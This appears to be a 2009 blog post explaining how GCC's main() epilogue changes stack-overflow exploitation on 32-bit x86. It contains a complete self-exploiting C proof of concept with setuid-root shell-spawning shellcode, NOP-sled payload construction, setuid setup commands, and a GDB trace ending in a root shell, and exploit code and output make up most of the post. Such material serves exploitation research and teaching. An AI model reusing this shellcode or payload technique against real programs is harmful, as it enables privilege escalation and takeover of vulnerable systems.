Sunday, December 13, 2009

Exploiting a Buffer Overflow in main()

A buffer overflow in main() is very hard to imagine. I've never seen one myself, since main usually delegates to other parts of a system very early on. Though, I noticed yesterday that GCC sets up the main() function a bit differently than others.

Take the following empty program as an example:
int func()
{
}

int main()
{
}

When compiling this without stack protection gives the following:
08048344 <func>:
 8048344: 55                    push   ebp
 8048345: 89 e5                 mov    ebp,esp
 8048347: 5d                    pop    ebp
 8048348: c3                    ret    

08048349 <main>:
 8048349: 8d 4c 24 04           lea    ecx,[esp+0x4]
 804834d: 83 e4 f0              and    esp,0xfffffff0
 8048350: ff 71 fc              push   DWORD PTR [ecx-0x4]
 8048353: 55                    push   ebp
 8048354: 89 e5                 mov    ebp,esp
 8048356: 51                    push   ecx
 8048357: 59                    pop    ecx
 8048358: 5d                    pop    ebp
 8048359: 8d 61 fc              lea    esp,[ecx-0x4]
 804835c: c3                    ret    
 804835d: 90                    nop    
 804835e: 90                    nop    
 804835f: 90                    nop    

A normal function, in it's prologue, stores any previous "ebp" on the stack, and loads the new stack pointer (esp) into ebp. From here it will use "ebp" to do any stack calculations for local variables/arguments. Then before returning it will restore the previous ebp, and return. This means, the last 8 bytes on the stack will be [ebp:4][eip:4]. When the function returns the caller's "ebp" is popped, and the "ret" instruction will pop the new "eip" and continue execution.

The main function on the other hand (I keep wanting to say "method" instead of "function" - I'm Java brainwashed) does it a bit differently. First it loads the address of "esp + 4" into ecx. This will be the "int argc" argument. Then it ensures the stack is at a 16 byte block and pushes the original return address into the new stack location. They have to do this, otherwise main won't be able to return (unless esp's last 4 bits were already 0000b). "main" returns to a function called __libc_start_main, which is one of the many bootstrapping functions GCC puts into it's resulting binaries.

After this it's the normal ebp/esp business, and some preparation for the arguments like saving the value of ecx, since future functions might want to use it. In the example above, 0x8048358 is where the epilogue starts. This restores the value of ecx and ebp, and then the big business that makes exploiting a main method different. It changes the stack pointer (esp), to what it was before entry into main, and only then it returns. This means the resulting value of "esp" should point to the new return address, which would probably be another stack address, filled with a payload.

Usually when you exploit a buffer overflow, you have a NOP sled, the shellcode and then a sequence of return addresses. Had you done this in a main function you will end up with having esp having the value of the return address, and then the ret instruction trying to jump to 0x90909090. This won't work for obvious reasons. You would need to be very precise in setting up this buffer. First you would have to supply an address, which would get loaded into "ecx". The value of this address needs to be 4 bytes greater, than where the real return address is on the stack.

These values will all be based around offsets from the return address. There are a few address padding techniques I've come up with to help increase the hit probability. They're all pretty much similar, having sequences of 2 address placed in different places. To keep this short, I'll explain the simplest of them all.

The easiest can be used when you have a very large buffer. Assume the variable RET is our return address. You could then override the end of the buffer with this address as usual, but instead of a NOP sled, you can first write X instances of RET + X * 4, and then have the NOP sled follow.

To demonstrate this I created a PoC. This program has a 1000 byte buffer in main(), and then sets up an exploit to spawn a shell and copies this into the buffer. So it exploits itself (wouldn't that be a dream - save the hackers some time and write the exploit before you ship your software).
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define BUFSIZE 1000
#define PAYLOADSIZE (BUFSIZE * 2)
#define SLEDSIZE 100
#define RETADDR_CNT 20

char shellcode[]=
  // setuid(0) + exec(/bin/sh)
  "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
  "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
  "\xe1\xcd\x80" // 35 bytes
  ;

void *alignaddr(void *ptr)
{
  while ((long)ptr % 4) ++ptr;
  return ptr;
}

void *setupExploit(void *bufaddr)
{
  long sled_addr, stack_addr;
  char *expldata = (char*)malloc(PAYLOADSIZE * sizeof(char));
  char *ptr = expldata;
  int i;

  if (ptr == NULL)
  {
    error(1, 0, "Failed to prepare payload");
  }

  ptr = alignaddr(ptr);

  // this is the address that will go into "ecx", and have 4 deducted
  // from it to get the new stack frame address
  stack_addr = (long)bufaddr + 4; 
  // this is the address where the NOP sled and shellcode will be
  sled_addr = (long)bufaddr + 4 * RETADDR_CNT;

  printf("Buf Addr: %p\n", bufaddr);
  printf("SLED Addr: %p\n", sled_addr);
  printf("Stack Addr: %p\n", stack_addr);

  // write the sled address to the beginning of the buffer
  for (i = 0; i < RETADDR_CNT; ++i)
  {
    *((long*)ptr) = sled_addr;
    ptr += 4;
  }

  // follow with a NOP sled
  for (i = 0; i < SLEDSIZE; ++i)
  {
    *ptr++ = 0x90;
  }

  // add the shellcode
  memcpy(ptr, shellcode, sizeof(shellcode));
  ptr += sizeof(shellcode);

  // align the address
  ptr = alignaddr(ptr);

  // and fill the remaining with the stack address
  while (ptr < expldata + PAYLOADSIZE)
  {
    *((long*)ptr) = stack_addr;
    ptr += 4;
  }

  return expldata;
}

int main(int argc, char **argv)
{
  char buf[BUFSIZE];
  char *expl;

  expl = setupExploit(buf);
  memcpy(buf, expl, PAYLOADSIZE);
}

Building and running this you will see something like:
quintin@quintin-laptop mainexpl $ gcc -fno-stack-protector -o mainexpl mainexpl.c 
quintin@quintin-laptop mainexpl $ sudo chown root:root mainexpl
quintin@quintin-laptop mainexpl $ sudo chmod u+s mainexpl
quintin@quintin-laptop mainexpl $ ./mainexpl 
Buf Addr: 0xbf9a48b8
SLED Addr: 0xbf9a4908
Stack Addr: 0xbf9a48bc
# id
uid=0(root) gid=1002(quintin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),33(www-data),44(video),46(plugdev),104(scanner),108(lpadmin),110(admin),115(netdev),117(powerdev),124(sambashare),1002(quintin)
# 

* To demonstrate this the program is built with stack protection turned off. This is the "-fno-stack-protector" argument given to gcc.

Taking into account the explanations from before, 0xbf9a48b8 is the address where our payload will go, 0xbf9a4908 is the actual address of where the NOP sled and shellcode will go and finally 0xbf9a48bc is where we need to store the SLED address, since this address will be put into ecx in the main() epilogue.

In a bit more detail, let's run it through GDB. The disassembled main() function:
0804854b <main>:
 804854b: 8d 4c 24 04           lea    ecx,[esp+0x4]
 804854f: 83 e4 f0              and    esp,0xfffffff0
 8048552: ff 71 fc              push   DWORD PTR [ecx-0x4]
 8048555: 55                    push   ebp
 8048556: 89 e5                 mov    ebp,esp
 8048558: 51                    push   ecx
 8048559: 81 ec 04 04 00 00     sub    esp,0x404
 804855f: 8d 85 10 fc ff ff     lea    eax,[ebp-0x3f0]
 8048565: 89 04 24              mov    DWORD PTR [esp],eax
 8048568: e8 bf fe ff ff        call   804842c <setupExploit>
 804856d: 89 45 f8              mov    DWORD PTR [ebp-0x8],eax
 8048570: c7 44 24 08 d0 07 00  mov    DWORD PTR [esp+0x8],0x7d0
 8048577: 00 
 8048578: 8b 45 f8              mov    eax,DWORD PTR [ebp-0x8]
 804857b: 89 44 24 04           mov    DWORD PTR [esp+0x4],eax
 804857f: 8d 85 10 fc ff ff     lea    eax,[ebp-0x3f0]
 8048585: 89 04 24              mov    DWORD PTR [esp],eax
 8048588: e8 b7 fd ff ff        call   8048344 <memcpy@plt>
 804858d: 81 c4 04 04 00 00     add    esp,0x404
 8048593: 59                    pop    ecx
 8048594: 5d                    pop    ebp
 8048595: 8d 61 fc              lea    esp,[ecx-0x4]
 8048598: c3                    ret    

We'll put a breakpoint at the start of the epilogue (the pop ecx), ie. 0x8048593.
quintin@quintin-laptop mainexpl $ gdb ./mainexpl
GNU gdb 6.8-debian
(gdb) break *0x8048593
Breakpoint 1 at 0x8048593
(gdb) run
Starting program: /home/quintin/tmp/notesearch/mainexpl 
Buf Addr: 0xbf9a48b8
SLED Addr: 0xbf9a4908
Stack Addr: 0xbf9a48bc

Breakpoint 1, 0x08048593 in main ()
Current language:  auto; currently asm
(gdb) i r ecx esp
ecx            0x0 0
esp            0xbf9a4ca4 0xbf9a4ca4
(gdb) x/8xw $esp
0xbf9a4ca4: 0xbf9a48bc 0xbf9a48bc 0xbf9a48bc 0xbf9a48bc
0xbf9a4cb4: 0xbf9a48bc 0xbf9a48bc 0xbf9a48bc 0xbf9a48bc
(gdb) 

As you can see the value of ecx is 0, and our new stack address is all over the current stack. Let's step the "pop ecx" instruction and see what we have then.
(gdb) stepi
0x08048594 in main ()
(gdb) i r ecx esp
ecx            0xbf9a48bc -1080407876
esp            0xbf9a4ca8 0xbf9a4ca8
(gdb) 

We don't care for ebp, so let's see what happens when we load the new stack address, 2 instructions onwards.
(gdb) stepi
0x08048595 in main ()
(gdb) stepi
0x08048598 in main ()
(gdb) i r ecx esp
ecx            0xbf9a48bc -1080407876
esp            0xbf9a48b8 0xbf9a48b8
(gdb) x/4xw $esp
0xbf9a48b8: 0xbf9a4908 0xbf9a4908 0xbf9a4908 0xbf9a4908
(gdb) 

So the stack frame was changed to where we put our return addresses. The next instruction to be executed is "ret", which would change the eip register to 0xbf9a4908, which is where our NOP sled and shellcode is, as can be seen with:
(gdb) x/10i 0xbf9a4908
0xbf9a4908: nop    
0xbf9a4909: nop    
0xbf9a490a: nop    
0xbf9a490b: nop    
0xbf9a490c: nop    
0xbf9a490d: nop    
0xbf9a490e: nop    
0xbf9a490f: nop    
0xbf9a4910: nop    
0xbf9a4911: nop    
(gdb) x/20i 0xbf9a4908+97
0xbf9a4969: nop    
0xbf9a496a: nop    
0xbf9a496b: nop    
0xbf9a496c: xor    eax,eax
0xbf9a496e: xor    ebx,ebx
0xbf9a4970: xor    ecx,ecx
0xbf9a4972: cdq    
0xbf9a4973: mov    al,0xa4
0xbf9a4975: int    0x80
0xbf9a4977: push   0xb
0xbf9a4979: pop    eax
0xbf9a497a: push   ecx
0xbf9a497b: push   0x68732f2f
0xbf9a4980: push   0x6e69622f
0xbf9a4985: mov    ebx,esp
0xbf9a4987: push   ecx
0xbf9a4988: mov    edx,esp
0xbf9a498a: push   ebx
0xbf9a498b: mov    ecx,esp
0xbf9a498d: int    0x80
(gdb) 

The next step will be to execute the "ret", and start executing the shellcode:
(gdb) continue
Continuing.
Executing new program: /bin/dash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
$ 


And that's one way of exploiting a stack overflow in main(). If you had a small buffer, high precision is needed, but you could put the return address 2 words after the new stack address. Or you could put the shellcode somewhere else and use this buffer purely for addressing. Many things are possible, and every scenario is unique.

No comments: